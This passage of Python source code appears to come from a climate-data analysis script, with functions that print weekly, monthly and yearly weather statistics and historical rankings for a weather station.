checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tmaxM == "T" else "", "*" if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tmaxQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tmax if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) 
and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tmax != "" else "M", clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tmaxM if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tmaxM == "T" else "", "*" if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tmaxQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tmax if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tmax != "" else "M", clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tmaxM if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tmaxM == "T" else "", "*" if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tmaxQ != "" else ""))) print("{:^6}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}".format("TMIN", "{}{}{}".format( clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tmin if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tmin != "" else "M", clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tminM if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tminM == "T" else "", "*" if checkDate2(indvweekdays[0].year,indvweekdays[0].month,indvweekdays[0].day) and clmt[indvweekdays[0].year][indvweekdays[0].month][indvweekdays[0].day].tminQ != "" else 
""), "{}{}{}".format( clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tmin if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tmin != "" else "M", clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tminM if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tminM == "T" else "", "*" if checkDate2(indvweekdays[1].year,indvweekdays[1].month,indvweekdays[1].day) and clmt[indvweekdays[1].year][indvweekdays[1].month][indvweekdays[1].day].tminQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tmin if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tmin != "" else "M", clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tminM if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tminM == "T" else "", "*" if checkDate2(indvweekdays[2].year,indvweekdays[2].month,indvweekdays[2].day) and clmt[indvweekdays[2].year][indvweekdays[2].month][indvweekdays[2].day].tminQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tmin if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tmin != "" else "M", clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tminM if checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tminM == "T" else "", "*" if 
checkDate2(indvweekdays[3].year,indvweekdays[3].month,indvweekdays[3].day) and clmt[indvweekdays[3].year][indvweekdays[3].month][indvweekdays[3].day].tminQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tmin if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tmin != "" else "M", clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tminM if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tminM == "T" else "", "*" if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tminQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tmin if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tmin != "" else "M", clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tminM if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tminM == "T" else "", "*" if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tminQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tmin if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tmin != "" else "M", clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tminM if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and 
clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tminM == "T" else "", "*" if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tminQ != "" else ""))) print("") print("Total Precipitation: {}{}".format( round(sum(w_prcp),2), ", Rank: {}".format(rank(prcphist.index(round(sum(w_prcp),2))+1)) if sum(w_prcp) != 0 else "" )) print("Total Precipitation Days (>= T): {}".format(w_prcpDAYS)) if w_snowDAYS >= 1: print("Total Snow: {}{}".format( round(sum(w_snow),1), ", Rank: {}".format(rank(snowhist.index(round(sum(w_snow),1))+1)) if sum(w_snow) != 0 else "" )) print("Total Snow Days (>= T): {}".format(w_snowDAYS)) if len(w_snwd) > 0 and mean(w_snwd) > 0: print("Average Snow Depth: {}{}".format( round(mean(w_snwd),1), ", Rank: {}".format(rank(snwdhist.index(round(mean(w_snwd),1))+1)) if mean(w_snwd) != 0 and len(w_snwd) > excludeweek else "" )) if records_in_week > excludeweek and (len(w_tmax) <= excludeweek or len(w_tmin) <= excludeweek): print("*** TEMPERATURE STATS LIKELY UNDERREPRESENTED ***") print("Average Temperature: {}{}{}".format( round(mean(w_alltemps),1) if len(w_alltemps) > 0 else "N/A", ", Rank: {} Warmest".format(rank(tavgdeschist.index(round(mean(w_alltemps),1))+1)) if len(w_alltemps) > excludeweek*2 and tavgdeschist.index(round(mean(w_alltemps),1)) <= tavgaschist.index(round(mean(w_alltemps),1)) else "", ", Rank: {} Coolest".format(rank(tavgaschist.index(round(mean(w_alltemps),1))+1)) if len(w_alltemps) > excludeweek*2 and tavgaschist.index(round(mean(w_alltemps),1)) <= tavgdeschist.index(round(mean(w_alltemps),1)) else "" )) print("Average Max Temperature: {}{}{}".format( round(mean(w_tmax),1) if len(w_tmax) > 0 else "N/A", ", Rank: {} Warmest".format(rank(tmaxdeschist.index(round(mean(w_tmax),1))+1)) if len(w_tmax) > excludeweek and tmaxdeschist.index(round(mean(w_tmax),1)) <= tmaxaschist.index(round(mean(w_tmax),1)) else "", ", Rank: 
{} Coolest".format(rank(tmaxaschist.index(round(mean(w_tmax),1))+1)) if len(w_tmax) > excludeweek and tmaxaschist.index(round(mean(w_tmax),1)) <= tmaxdeschist.index(round(mean(w_tmax),1)) else "" )) #print(tmaxaschist.index(round(mean(w_tmax),1)),tmaxdeschist.index(round(mean(w_tmax),1))) print("Average Min Temperature: {}{}{}".format( round(mean(w_tmin),1) if len(w_tmin) > 0 else "N/A", ", Rank: {} Warmest".format(rank(tmindeschist.index(round(mean(w_tmin),1))+1)) if tmindeschist.index(round(mean(w_tmin),1)) <= tminaschist.index(round(mean(w_tmin),1)) else "", ", Rank: {} Coolest".format(rank(tminaschist.index(round(mean(w_tmin),1))+1)) if len(w_tmin) > excludeweek and tminaschist.index(round(mean(w_tmin),1)) <= tmindeschist.index(round(mean(w_tmin),1)) else "" )) #print(tminaschist.index(round(mean(w_tmin),1)),tmindeschist.index(round(mean(w_tmin),1))) print("") def monthStats(y,m): """Report on recorded statistics for a month of interest. It accepts only arguments for the year and month of interest. Passed arguments MUST be integers. monthStats(year,month) EXAMPLE: monthStats(2005,7) -> Returns a printout of month-based statistics from July 2005. """ if len(clmt) == 0: return print("* OOPS! 
Run the clmtAnalyze function first.") monthExists = checkDate(y,m) if monthExists: ranks = ["th","st","nd","rd","th","th","th","th","th","th"] prcpaschist = sorted(list(set(list(var for var in clmt_vars_months["prcp"] for MONTH in clmt_vars_months["prcp"][var] if MONTH.month == m and clmt[MONTH.year][MONTH.month]["recordqty"] > excludemonth)))) prcpdeschist = sorted(list(set(list(var for var in clmt_vars_months["prcp"] for MONTH in clmt_vars_months["prcp"][var] if MONTH.month == m))),reverse=True) #prcpDAYSaschist = sorted(set(list(clmt[Y][m]["prcpDAYS"] for Y in [yr for yr in clmt if type(yr) == int] if m in clmt[Y] and clmt[Y][m]["recordqty"] > excludemonth))) #prcpDAYSdeschist = sorted(list(set(list(clmt[Y][m]["prcpDAYS"] for Y in [yr for yr in clmt if type(yr) == int] if m in clmt[Y]))),reverse=True) #snowaschist = sorted(list(var for var in clmt_vars_months["snow"] for MONTH in clmt_vars_months["snow"][var] if MONTH.month == m and clmt[MONTH.year][MONTH.month]["recordqty"] > excludemonth)) snowdeschist = sorted(list(set(list(var for var in clmt_vars_months["snow"] for MONTH in clmt_vars_months["snow"][var] if MONTH.month == m))),reverse=True) #snowDAYSdeschist = sorted(list(set(list(clmt[Y][m]["snowDAYS"] for Y in [yr for yr in clmt if type(yr) == int] if m in clmt[Y]))),reverse=True) #snwddeschist = sorted(list(set(list(var for var in clmt_vars_months["snwd"] for MONTH in clmt_vars_months["snwd"][var] if MONTH.month == m))),reverse=True) #snwdDAYSdeschist = sorted(list(set(list(clmt[Y][m]["snwdDAYS"] for Y in [yr for yr in clmt if type(yr) == int] if m in clmt[Y]))),reverse=True) tmaxaschist = sorted(list(set(list(var for var in clmt_vars_months["tmax"] for MONTH in clmt_vars_months["tmax"][var] if MONTH.month == m)))) tmaxdeschist = sorted(list(set(list(var for var in clmt_vars_months["tmax"] for MONTH in clmt_vars_months["tmax"][var] if MONTH.month == m))),reverse=True) tminaschist = sorted(list(set(list(var for var in clmt_vars_months["tmin"] for MONTH in 
clmt_vars_months["tmin"][var] if MONTH.month == m)))) tmindeschist = sorted(list(set(list(var for var in clmt_vars_months["tmin"] for MONTH in clmt_vars_months["tmin"][var] if MONTH.month == m))),reverse=True) tavgaschist = sorted(list(set(list(var for var in clmt_vars_months["tavg"] for MONTH in clmt_vars_months["tavg"][var] if MONTH.month == m)))) tavgdeschist = sorted(list(set(list(var for var in clmt_vars_months["tavg"] for MONTH in clmt_vars_months["tavg"][var] if MONTH.month == m))),reverse=True) #print(tavgdeschist) #for x in [prcphist,snowhist,tmaxaschist,tmaxdeschist,tminaschist,tmindeschist,tavgaschist,tavgdeschist]: print(x) if clmt[y][m]["recordqty"] <= excludemonth: print("-------------------------------------") print("*** MONLTHLY STATS MAY NOT BE COMPLETE FOR RELIANCE ON STATISTICS ***") print("-------------------------------------") print("Monthly Statistics for {} {}".format(calendar.month_name[m],y)) print("{}: {}".format(clmt["station"],clmt["station_name"])) print("Quantity of Records: {}".format(clmt[y][m]["recordqty"])) print("* Reported rankings are relative to the month of {}".format(calendar.month_name[m])) print("-----") # PRCP related try: print("Total Precipitation: {}{}{}".format( round(sum(clmt[y][m]["prcp"]),2), ", Rank: {} Wettest".format(rank(prcpdeschist.index(round(sum(clmt[y][m]["prcp"]),2))+1)) if sum(clmt[y][m]["prcp"]) > 0 and prcpdeschist.index(round(sum(clmt[y][m]["prcp"]),2)) <= prcpaschist.index(round(sum(clmt[y][m]["prcp"]),2)) else "", ", Rank: {} Driest".format(rank(prcpaschist.index(round(sum(clmt[y][m]["prcp"]),2))+1)) if clmt[y][m]["recordqty"] > excludemonth and prcpaschist.index(round(sum(clmt[y][m]["prcp"]),2)) <= prcpdeschist.index(round(sum(clmt[y][m]["prcp"]),2)) else "")) except: print("Total Precipitation: {}".format(round(sum(clmt[y][m]["prcp"]),2))) print("Total Precipitation Days (>= T): {}".format(clmt[y][m]["prcpDAYS"])) if round(sum(clmt[y][m]["prcp"]),2) > 0: print("-- Highest Daily Precip: 
{}".format(clmt[y][m]["prcpPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y][m]["prcpPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y][m]["prcpPROP"]["day_max"][1][len(clmt[y][m]["prcpPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) # SNOW related if sum(clmt[y][m]["snow"]) > 0 or clmt[y][m]["snowDAYS"] > 0: print("Total Snow: {}{}".format( round(sum(clmt[y][m]["snow"]),1), ", Rank: {} Snowiest".format(rank(snowdeschist.index(round(sum(clmt[y][m]["snow"]),2))+1)) if sum(clmt[y][m]["snow"]) > 0 else ", -- ; " )) print("Total Snow Days (>= T): {}".format(clmt[y][m]["snowDAYS"])) if round(sum(clmt[y][m]["snow"]),1) > 0: print("-- Highest Daily Snow Total: {}".format(clmt[y][m]["snowPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y][m]["snowPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y][m]["snowPROP"]["day_max"][1][len(clmt[y][m]["snowPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) # SNWD related if clmt[y][m]["snwdDAYS"] > 0: print("Total Days with Snow on the Ground ('snwd' >= T): {}".format(clmt[y][m]["snwdDAYS"])) if any(v > 0 for v in clmt[y][m]["snwd"]): # If any of the snwd days are > 0 print("-- Highest Daily Snow-Depth Total: {}".format(clmt[y][m]["snwdPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y][m]["snwdPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y][m]["snwdPROP"]["day_max"][1][len(clmt[y][m]["snwdPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) try: print("Average Temperature: {}{}{}".format( round(mean(clmt[y][m]["tempAVGlist"]),1), ", Rank: {} Warmest".format(rank(tavgdeschist.index(round(mean(clmt[y][m]["tempAVGlist"]),1))+1)) if len(clmt[y][m]["tempAVGlist"]) > excludemonth*2 and tavgdeschist.index(round(mean(clmt[y][m]["tempAVGlist"]),1)) <= tavgaschist.index(round(mean(clmt[y][m]["tempAVGlist"]),1)) else "", ", Rank: {} Coolest".format(rank(tavgaschist.index(round(mean(clmt[y][m]["tempAVGlist"]),1))+1)) if 
len(clmt[y][m]["tempAVGlist"]) > excludemonth*2 and tavgaschist.index(round(mean(clmt[y][m]["tempAVGlist"]),1)) <= tavgdeschist.index(round(mean(clmt[y][m]["tempAVGlist"]),1)) else "" )) except: print("Average Temperature: N/A") try: print("Average MAX Temperature: {}{}{}".format( round(mean(clmt[y][m]["tmax"]),1), ", Rank: {} Warmest".format(rank(tmaxdeschist.index(round(mean(clmt[y][m]["tmax"]),1))+1)) if len(clmt[y][m]["tmax"]) > excludemonth and tmaxdeschist.index(round(mean(clmt[y][m]["tmax"]),1)) <= tmaxaschist.index(round(mean(clmt[y][m]["tmax"]),1)) else "", ", Rank: {} Coolest".format(rank(tmaxaschist.index(round(mean(clmt[y][m]["tmax"]),1))+1)) if len(clmt[y][m]["tmax"]) > excludemonth and tmaxaschist.index(round(mean(clmt[y][m]["tmax"]),1)) <= tmaxdeschist.index(round(mean(clmt[y][m]["tmax"]),1)) else "" )) if round(sum(clmt[y][m]["tmax"]),1) > 0: print("-- Warmest Daily TMAX: {}".format(clmt[y][m]["tmaxPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y][m]["tmaxPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y][m]["tmaxPROP"]["day_max"][1][len(clmt[y][m]["tmaxPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) if round(sum(clmt[y][m]["tmax"]),1) > 0: print("-- Coolest Daily TMAX: {}".format(clmt[y][m]["tmaxPROP"]["day_min"][0]),end = " ::: ") for x in clmt[y][m]["tmaxPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y][m]["tmaxPROP"]["day_min"][1][len(clmt[y][m]["tmaxPROP"]["day_min"][1])-1] else print("{}".format(x.daystr)) except: print("Average MAX Temperature: N/A") try: print("Average MIN Temperature: {}{}{}".format( round(mean(clmt[y][m]["tmin"]),1), ", Rank: {} Warmest".format(rank(tmindeschist.index(round(mean(clmt[y][m]["tmin"]),1))+1)) if len(clmt[y][m]["tmin"]) > excludemonth and tmindeschist.index(round(mean(clmt[y][m]["tmin"]),1)) <= tminaschist.index(round(mean(clmt[y][m]["tmin"]),1)) else "", ", Rank: {} 
Coolest".format(rank(tminaschist.index(round(mean(clmt[y][m]["tmin"]),1))+1)) if len(clmt[y][m]["tmin"]) > excludemonth and tminaschist.index(round(mean(clmt[y][m]["tmin"]),1)) <= tmindeschist.index(round(mean(clmt[y][m]["tmin"]),1)) else "" )) if round(sum(clmt[y][m]["tmin"]),1) > 0: print("-- Warmest Daily TMIN: {}".format(clmt[y][m]["tminPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y][m]["tminPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y][m]["tminPROP"]["day_max"][1][len(clmt[y][m]["tminPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) if round(sum(clmt[y][m]["tmin"]),1) > 0: print("-- Coolest Daily TMIN: {}".format(clmt[y][m]["tminPROP"]["day_min"][0]),end = " ::: ") for x in clmt[y][m]["tminPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y][m]["tminPROP"]["day_min"][1][len(clmt[y][m]["tminPROP"]["day_min"][1])-1] else print("{}".format(x.daystr)) except: print("Average MIN Temperature: N/A") if all(len(x) == 0 for x in [clmt[y][m]["tempAVGlist"],clmt[y][m]["tmax"],clmt[y][m]["tmin"]]): print("*** No Reliable Temperature Data for {} {}".format(calendar.month_abbr[m],y)) print("-----") def yearStats(y): """Report on recorded statistics for a year of interest. It accepts only an argument for the year. Passed argument MUST be an integer. yearStats(year) EXAMPLE: yearStats(1945) -> Returns a printout of year-based statistics from 1945 """ if len(clmt) == 0: return print("* OOPS! 
Run the clmtAnalyze function first.") # clmt[int(each[2][0:4])]["prcpPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]],"month_min":[999,[]]} # clmt[int(each[2][0:4])]["snowPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]]} # clmt[int(each[2][0:4])]["tempAVGlist"] = [] # clmt[int(each[2][0:4])]["tmax"] = [] # clmt[int(each[2][0:4])]["tmaxPROP"] = {"day_max":[-999,[]],"day_min":[999,[]],"month_AVG_max":[-999,[]],"month_AVG_min":[999,[]]} yearExists = checkDate(y) if yearExists: prcpaschist, prcpdeschist, prcpDAYSaschist, prcpDAYSdeschist, snowaschist, snowdeschist, snowDAYSaschist, snowDAYSdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist = yearRank("temps",5,yearStatsRun=True) snwdDAYSdeschist = sorted(set(list(clmt[YR]["snwdDAYS"] for YR in [Y for Y in clmt if type(Y) == int] if clmt[YR]["snwdDAYS"] != 0)),reverse=True) snwdDAYSaschist = sorted(set(list(clmt[YR]["snwdDAYS"] for YR in [Y for Y in clmt if type(Y) == int] if clmt[YR]["recordqty"] > excludeyear))) #for x in [prcpaschist, prcpdeschist, snowaschist, snowdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist]: print(len(x)) print("") print("{:^55}".format("Yearly Statistics for {}".format(y))) print("{:^55}".format("{}: {}".format(clmt["station"],clmt["station_name"]))) print("{:^55}".format("Quantity of Records: {}".format(clmt[y]["recordqty"]))) if clmt[y]["recordqty"] <= excludeyear: print("{:-^55}".format("")) print("*** YEAR STATS MAY NOT BE COMPLETE FOR RELIANCE ON STATISTICS ***") print("{:-^55}".format("")) print("{:^6}|{:^7}|{:^7}|{:^7}|{:^7}|{:^7}|{:^7}|".format("","JAN","FEB","MAR","APR","MAY","JUN")) print("{:-^55}".format("")) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "PRCP", "{:.2f}".format(round(sum(clmt[y][1]["prcp"]),2)) if 1 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][2]["prcp"]),2)) if 2 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][3]["prcp"]),2)) if 3 in clmt[y] else "", 
"{:.2f}".format(round(sum(clmt[y][4]["prcp"]),2)) if 4 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][5]["prcp"]),2)) if 5 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][6]["prcp"]),2)) if 6 in clmt[y] else "", )) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "SNOW", "{:.1f}".format(round(sum(clmt[y][1]["snow"]),1)) if 1 in clmt[y] and (sum(clmt[y][1]["snow"]) > 0 or clmt[y][1]["snowDAYS"] > 0) else (" -- " if 1 in clmt[y] and sum(clmt[y][1]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][2]["snow"]),1)) if 2 in clmt[y] and (sum(clmt[y][2]["snow"]) > 0 or clmt[y][2]["snowDAYS"] > 0) else (" -- " if 2 in clmt[y] and sum(clmt[y][2]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][3]["snow"]),1)) if 3 in clmt[y] and (sum(clmt[y][3]["snow"]) > 0 or clmt[y][3]["snowDAYS"] > 0) else (" -- " if 3 in clmt[y] and sum(clmt[y][3]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][4]["snow"]),1)) if 4 in clmt[y] and (sum(clmt[y][4]["snow"]) > 0 or clmt[y][4]["snowDAYS"] > 0) else (" -- " if 4 in clmt[y] and sum(clmt[y][4]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][5]["snow"]),1)) if 5 in clmt[y] and (sum(clmt[y][5]["snow"]) > 0 or clmt[y][5]["snowDAYS"] > 0) else (" -- " if 5 in clmt[y] and sum(clmt[y][5]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][6]["snow"]),1)) if 6 in clmt[y] and (sum(clmt[y][6]["snow"]) > 0 or clmt[y][6]["snowDAYS"] > 0) else (" -- " if 6 in clmt[y] and sum(clmt[y][6]["snow"]) == 0 else ""), )) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "TAVG", "{:.1f}".format(round(mean(clmt[y][1]["tempAVGlist"]),1)) if 1 in clmt[y] and len(clmt[y][1]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(clmt[y][2]["tempAVGlist"]),1)) if 2 in clmt[y] and len(clmt[y][2]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(clmt[y][3]["tempAVGlist"]),1)) if 3 in clmt[y] and len(clmt[y][3]["tempAVGlist"]) > 2 else "", 
"{:.1f}".format(round(mean(clmt[y][4]["tempAVGlist"]),1)) if 4 in clmt[y] and len(clmt[y][4]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(clmt[y][5]["tempAVGlist"]),1)) if 5 in clmt[y] and len(clmt[y][5]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(clmt[y][6]["tempAVGlist"]),1)) if 6 in clmt[y] and len(clmt[y][6]["tempAVGlist"]) > 2 else "", )) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "TMAX", "{:.1f}".format(round(mean(clmt[y][1]["tmax"]),1)) if 1 in clmt[y] and len(clmt[y][1]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][2]["tmax"]),1)) if 2 in clmt[y] and len(clmt[y][2]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][3]["tmax"]),1)) if 3 in clmt[y] and len(clmt[y][3]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][4]["tmax"]),1)) if 4 in clmt[y] and len(clmt[y][4]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][5]["tmax"]),1)) if 5 in clmt[y] and len(clmt[y][5]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][6]["tmax"]),1)) if 6 in clmt[y] and len(clmt[y][6]["tmax"]) > 1 else "", )) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "TMIN", "{:.1f}".format(round(mean(clmt[y][1]["tmin"]),1)) if 1 in clmt[y] and len(clmt[y][1]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][2]["tmin"]),1)) if 2 in clmt[y] and len(clmt[y][2]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][3]["tmin"]),1)) if 3 in clmt[y] and len(clmt[y][3]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][4]["tmin"]),1)) if 4 in clmt[y] and len(clmt[y][4]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][5]["tmin"]),1)) if 5 in clmt[y] and len(clmt[y][5]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][6]["tmin"]),1)) if 6 in clmt[y] and len(clmt[y][6]["tmin"]) > 1 else "", )) print("{:-^55}".format("")) print("{:^6}|{:^7}|{:^7}|{:^7}|{:^7}|{:^7}|{:^7}|".format("","JUL","AUG","SEP","OCT","NOV","DEC")) print("{:-^55}".format("")) print("{:^6}|{:>6} |{:>6} 
|{:>6} |{:>6} |{:>6} |{:>6} |".format( "PRCP", "{:.2f}".format(round(sum(clmt[y][7]["prcp"]),2)) if 7 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][8]["prcp"]),2)) if 8 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][9]["prcp"]),2)) if 9 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][10]["prcp"]),2)) if 10 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][11]["prcp"]),2)) if 11 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][12]["prcp"]),2)) if 12 in clmt[y] else "", )) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "SNOW", "{:.1f}".format(round(sum(clmt[y][7]["snow"]),1)) if 7 in clmt[y] and (sum(clmt[y][7]["snow"]) > 0 or clmt[y][7]["snowDAYS"] > 0) else (" -- " if 7 in clmt[y] and sum(clmt[y][7]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][8]["snow"]),1)) if 8 in clmt[y] and (sum(clmt[y][8]["snow"]) > 0 or clmt[y][8]["snowDAYS"] > 0) else (" -- " if 8 in clmt[y] and sum(clmt[y][8]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][9]["snow"]),1)) if 9 in clmt[y] and (sum(clmt[y][9]["snow"]) > 0 or clmt[y][9]["snowDAYS"] > 0) else (" -- " if 9 in clmt[y] and sum(clmt[y][9]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][10]["snow"]),1)) if 10 in clmt[y] and (sum(clmt[y][10]["snow"]) > 0 or clmt[y][10]["snowDAYS"] > 0) else (" -- " if 10 in clmt[y] and sum(clmt[y][10]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][11]["snow"]),1)) if 11 in clmt[y] and (sum(clmt[y][11]["snow"]) > 0 or clmt[y][11]["snowDAYS"] > 0) else (" -- " if 11 in clmt[y] and sum(clmt[y][11]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][12]["snow"]),1)) if 12 in clmt[y] and (sum(clmt[y][12]["snow"]) > 0 or clmt[y][12]["snowDAYS"] > 0) else (" -- " if 12 in clmt[y] and sum(clmt[y][12]["snow"]) == 0 else ""), )) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "TAVG", 